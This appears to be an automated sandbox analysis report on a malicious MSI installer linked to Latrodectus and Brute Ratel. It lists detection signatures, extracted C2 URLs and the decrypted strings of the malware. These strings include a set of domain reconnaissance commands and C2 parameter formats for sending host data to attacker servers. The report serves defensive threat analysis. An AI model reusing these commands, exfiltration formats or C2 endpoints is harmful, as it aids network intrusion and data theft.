Windows Analysis Report
das.msi

Overview

General Information

Sample name:	das.msi
Analysis ID:	1525187
MD5:	3cb6b99b20930ac0dbadc10899dc511e
SHA1:	570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
SHA256:	ea1792f689bfe5ad3597c7f877b66f9fcf80d732e5233293d52d374d50cab991
Tags:	BruteRatelBruteRatelmsiuser-k3dg3___
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Bazar Loader

Yara detected BruteRatel

Yara detected Latrodectus

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Drops executables to the windows directory (C:\Windows) and starts them

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Sample uses string decryption to hide its real strings

Sets debug register (to hijack the execution of another thread)

Sigma detected: RunDLL32 Spawning Explorer

Uses known network protocols on non-standard ports

Writes to foreign memory regions

Checks for available system drives (often done to infect USB drives)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Brute Ratel C4, BruteRatel	Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.	No Attribution	https://0xdarkvortex.dev/hiding-in-plainsight/ https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name	Description	Attribution	Blogpost URLs	Link
Latrodectus, Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/ https://0x0d4y.blog/latrodectus-technical-analysis-of-the-new-icedid/ https://any.run/malware-trends/latrodectus https://blog.krakz.fr/articles/latrodectus/ https://blog.reveng.ai/latrodectus-distribution-via-brc4/	https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Signatures

AV Detection

Found malware configuration

Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Sample uses string decryption to hide its real strings

Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c ipconfig /all
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c systeminfo
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c nltest /domain_trusts
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c net view /all
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c net view /all /domain
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &ipconfig=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c net config workstation
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /c whoami /groups
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &systeminfo=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &domain_trusts=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &domain_trusts_all=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &net_view_all_domain=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &net_view_all=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &net_group=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &wmic=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &net_config_ws=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &net_wmic_av=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &whoami_group=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "pid":
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "%d",
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "proc":
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "%s",
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "subproc": [
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &proclist=[
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "pid":
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "%d",
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "proc":
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "%s",
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "subproc": [
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &desklinks=[
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: .
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "%s"
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Update_%x
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Custom_update
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: .dll
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: .exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Error
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: runnung
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: %s/%s
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: front
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: /files/
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Alpha
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Cookie:
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: POST
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: GET
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: curl/7.88.1
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: CLEARURL
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: URLS
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: COMMAND
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: ERROR
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: [{"data":"
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: "}]
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &dpost=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: https://isomicrotich.com/test/
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: https://opewolumeras.com/test/
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: \*.dll
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: AppData
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Desktop
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Startup
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Personal
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Local AppData
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: %s%d.dll
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: <!DOCTYPE
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Content-Length: 0
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: <html>
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Content-Type: application/dns-message
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: Content-Type: application/ocsp-request
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: 12345
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: 12345
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &stiller=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: %s%d.exe
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: %x%x
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &mac=
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: %02x
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: :%02x
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &computername=%s
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: &domain=%s
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: LogonTrigger
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: \Registry\Machine\
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: TimeTrigger
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: PT0H%02dM
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: PT0S
Source: 6.3.rundll32.exe.7df457350000.0.raw.unpack	String decryptor: \update_data.dat

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:62255 version: TLS 1.2

Source:	Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp, vierm_soft_x64.dll.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.1368921552.0000016AD27E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.1363899057.0000016AD27ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIA029.tmp, 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, MSIA029.tmp, 00000004.00000000.1352453561.0000000000F77000.00000002.00000001.01000000.00000003.sdmp, das.msi, 6a9d65.msi.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.dr
Source:	Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\Installer\MSIA029.tmp	Code function: 4_2_00F6AF79 FindFirstFileExW,	4_2_00F6AF79
Source: C:\Windows\explorer.exe	Code function: 9_2_00F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_00F2A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_00F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_00F22B28

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62255 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62259 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62261 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62271 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62291 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62341 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62306 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62334 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62273 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62258 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62371 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62257 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62396 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62282 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62353 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62267 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62338 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62321 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62332 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62284 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62315 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62274 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62362 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62402 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62344 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62393 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62380 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62356 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62304 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62263 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62347 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62279 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62293 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62308 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62326 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62383 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62278 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62286 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62420 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62272 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62354 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62297 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62296 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62323 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62404 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62365 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62401 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62414 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62351 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62331 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62372 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62270 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62416 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62307 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.7:62290 -> 188.114.97.3:443
